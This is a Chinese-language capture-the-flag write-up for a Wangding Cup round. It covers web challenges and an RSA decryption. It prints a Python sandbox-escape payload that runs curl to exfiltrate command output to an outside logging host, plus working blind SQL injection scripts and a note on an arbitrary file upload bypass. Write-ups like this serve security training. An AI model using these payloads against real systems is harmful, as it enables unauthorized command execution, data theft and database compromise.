WDB.2

网鼎杯第二场writeup

WEB

calc

计算器功能,其中有正则显示。
随手测试发现网站后端是用python写的。
尝试在计算器功能中执行命令,发现无法回显。
然后尝试DNS带出数据成功

1
1+1+().__class__.__bases__[0].__subclasses__()[59].__enter__.__func__.__getattribute__('__global' + 's__')['s'+'ys'].modules['o'+'s'].__getattribute__('sy' + 'stem')("curl ghljcn.ceye.io/`whoami | base64`")

然后查找 ‘find / -name flag’
读flag ‘cat /flag’

wafupload

代码审计,考点比较老了,之前在pwnhub的公开赛上出现过,就不详细解释了,关键点在php的对数组的end函数和count()-1对比产生的的差异,可以导致任意文件上传

然后在根目录下翻到flag,直接cat读即
参考https://www.virzz.com/2017/09/20/pwnhub_writeups_sha_fu_fu_workdays.html

sqlweb

弱密码admin admin123登陆成功,然后提示给了表明列名
删除cookie重新登录,发现了黑名单,但是没有过滤小于号,尝试注入,单引号闭合成功。
payload:wuyanzu’/**/&&passwd<’%s’#
直接贴上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
import requests as req
import string
url = 'http://7c9f5cab07ae428daedba75e55df7f9ed9d32408d5754c2f.game.ichunqiu.com/sql.php'
data = {
'uname':'',
'passwd':'admin123',
'submit':'1'
}
payload = """wuyanzu'/**/&&passwd<'%s'#"""
flag = ''
# for x in range(1,100):
# for y in range(30,127):
# print y
# payload1 = payload%(flag+chr(y))
# data['uname'] = payload1
# f = req.post(url,data)
# if 'passwd error' in f.content:
# flag += chr(y-1)
# print flag
# break
print 'FLAG{1BDE8B12-D7C6-4E53-BBC1-5BA1F7A8CCE4}'.lower()

unfinished

这是一个二次注入,发现注册页面后尝试注册 altman’ or 1=1#
登陆后发现用户名为 1 ,应该是bool盲注
题目过滤了很关键的逗号和information
我们只能用join绕过,最后写得脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python
#Author:Sublime
#coding:utf-8
import requests as req
import string
import random
url = 'http://6e38e15412a349e2bc0d3a7c28f23457be8f9872113449bc.game.ichunqiu.com/'
def reg(email,payload):
data = {
'email':email,
'username':payload,
'password':'aaa'
}
cookie = {
'PHPSESSID':'sba5or9h0mgsh2lr7boe8knji7'
}
f = req.post(url+'register.php',data=data,cookies=cookie,allow_redirects=False)
# print f.content

def login(email):
data1 = {
'email':email,
'password':'aaa'
}
cookie = {
'PHPSESSID':'sba5or9h0mgsh2lr7boe8knji7'
}
f = req.post(url+'login.php',data=data1,cookies=cookie)
# print f.content
if """<span class="user-name">
-1 </span>""" in f.content:
return 1
flag = ''
for x in range(1,100):
for y in string.printable:
payload = "admin'-(ascii(mid(reverse(mid((select * from (select i.1 from (select * from (select 1)a union select * from flag)i limit 1 offset 1)y limit 1)from(-"+str(x)+")))from(-1)))="+str(ord(y))+")-'"
email = str(int(random.randint(1,99999)))+'@xjb.com'
# print email
reg(email,payload)
a = login(email)
if a==1:
flag += y
print flag
break

crypto

RSA

常规的RSA解密

1
2
3
4
5
6
7
8
9
10
enc="ICCHhzayltixzeuA++PPbDwlialEjQuDBx38ecgQwl5lOTnemrcWYbDeQkIIE5oPQOcSmNX8nmcDgyl4O05jYD7VmDcgwQTIgHeOLovcqGVPHEW4hHSmIR3BB/CBjb3/5+HfeifXF1w+/o148o76D9NtTBYaLk8CTjOscT23PBI8w+WPhHBIPaSbJlDuaHA4Ie6ojsE6mM7cp79dz7bCdAf5a2tUGA6AbNCuP1WVnsBI+IIHX8EDELmBnQ5c13JuYnjHL5lmqL3QK88QwQQ4h/3vUODAWBuzn8meWBgfpqxmHTGJ+du2mRoUTpUBzZy2OxrKdD8J11Hc+yJJJkQe5QgqACbM00K0rTv7kIyB2aB/gUGLNP4IOwV09avUpzLS2PPLgeAVP/JSGYlXZTthy4FlqL5pMN4/+swNnEN6Z+lPzLNe0JB0uNN/yPJ3C3lsSuoFLh0InYI46Tycs8vz1nHQWjQdE6hpD/HpyCbjoC2BE4ugCJKUtmp7mbyDxkjkn5ZkHhrJXK/DF4NQgYmfkZxyLOWsI2UC1niq5qGD3SIspW8NcupyGakYVzD1R9PP8xoxpkjX62f7myXLMmacbJgYe7ExeWdYXMZd76Tnqu9IJJwEO43LZz+w2rqH8DIlhr64JenxaDcIixqFzKmkk6WK71VVT3t788ZxaNhG2yo="
c=int(enc.decode('base64').encode('hex'),16)
n = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357

e = 65537

d = 171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289

m =hex(pow(c,d,n))[2:].rstrip('L')
print ('0'+m).decode('hex')

flag{w3lC0M3_t0_rS4_w0RlD}